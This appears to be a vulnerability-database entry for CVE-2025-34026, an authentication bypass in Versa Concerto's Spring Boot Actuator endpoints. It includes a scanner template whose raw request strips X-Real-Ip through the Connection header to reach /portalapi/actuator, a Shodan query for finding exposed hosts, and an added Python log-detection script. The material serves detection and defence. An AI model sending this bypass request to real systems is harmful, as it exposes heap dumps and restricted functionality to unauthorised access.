
Versa Concerto Actuator Endpoint - Authentication Bypass

CVE-2025-34026
Verified

Description

An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header. Attackers could access restricted endpoints by omitting this header. The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.

Severity

Critical

CVSS Score

7.5

Exploit Probability

57%

Affected Product

concerto

Published Date

May 21, 2025

Template Author

iamnoooob, rootxharsh, parthmalhotra

CVE-2025-34026.yaml
id: CVE-2025-34026

info:
  name: Versa Concerto Actuator Endpoint - Authentication Bypass
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
  impact: |
    Attackers can bypass authentication by omitting the X-Real-Ip header to access restricted Spring Boot Actuator endpoints, potentially exposing sensitive system information and functionality.
  remediation: |
    Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.
  reference:
    - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
    - https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e
    - https://www.cve.org/CVERecord?id=CVE-2025-34026
  classification:
    cve-id: CVE-2025-34026
    cwe-id: CWE-288
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    epss-score: 0.56994
    epss-percentile: 0.98103
    cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: versa-networks
    product: concerto
    max-request: 1
    shodan-query: http.favicon.hash:-534530225
  tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev,vuln,kev

http:
  - raw:
      - |
        GET /portalapi/actuator HTTP/1.1
        Host: {{Hostname}}
        Connection: X-Real-Ip

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - heapdump

      - type: word
        part: header
        words:
          - EECP-CSRF-TOKEN
# digest: 4b0a00483046022100faab8af56199bdb49f14fe48df2fe7c3ff0b577e9d5330d6dd4cf5ba2ae5fe67022100e65f41beb8229e69cedfb72f2afe3e5f3f850af02bbf1091f818f400d958ae58:922c64590222798bb761d5b6d8e72950
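
The template's request sends `Connection: X-Real-Ip`; per RFC 9110 section 7.6.1 an intermediary removes any header named in `Connection` before forwarding, so a request in this shape reaches the backend without X-Real-Ip. The check below is an added example for edge or log-side detection, not part of the template or of Versa's code; the sample requests, the host `concerto.example` and the verdict labels are constructed assumptions.

```python
from urllib.parse import unquote, urlsplit

TRUSTED_HEADERS = {"x-real-ip"}             # header named in the advisory
SENSITIVE_PREFIX = "/portalapi/actuator"    # path from the template's request
STANDARD_OPTIONS = {"keep-alive", "close", "upgrade"}

def parse_request(raw):
    """Return (target, headers); headers maps lowercase name -> list of values."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return target, headers

def nominated_headers(headers):
    """Header names listed as hop-by-hop across every Connection header line."""
    tokens = set()
    for value in headers.get("connection", []):
        tokens.update(t.strip().lower() for t in value.split(",") if t.strip())
    return tokens - STANDARD_OPTIONS

def audit(raw):
    """'high': trusted header nominated on an actuator path; 'medium': elsewhere."""
    target, headers = parse_request(raw)
    if not nominated_headers(headers) & TRUSTED_HEADERS:
        return "none"
    path = unquote(urlsplit(target).path).lower()
    return "high" if path.startswith(SENSITIVE_PREFIX) else "medium"

# Constructed sample requests (concerto.example is a placeholder host).
SAMPLES = {
    "template": "GET /portalapi/actuator HTTP/1.1\r\nHost: concerto.example\r\n"
                "Connection: X-Real-Ip\r\n\r\n",
    "mixed": "GET /PortalAPI/actuator?x=1 HTTP/1.1\r\nHost: concerto.example\r\n"
             "Connection: keep-alive, x-real-IP\r\n\r\n",
    "split": "GET /index.html HTTP/1.1\r\nHost: concerto.example\r\n"
             "Connection: close\r\nConnection: X-Real-Ip\r\n\r\n",
    "benign": "GET /portalapi/actuator HTTP/1.1\r\nHost: concerto.example\r\n"
              "Connection: keep-alive\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:9} {audit(raw)}")
```

A legitimate client has no reason to nominate X-Real-Ip in `Connection`, so the `medium` verdict on other paths is still worth alerting on.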

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: cve-2025-34026
CWE ID: cwe-288

References

https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e
https://www.cve.org/CVERecord?id=CVE-2025-34026

Remediation Steps

Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.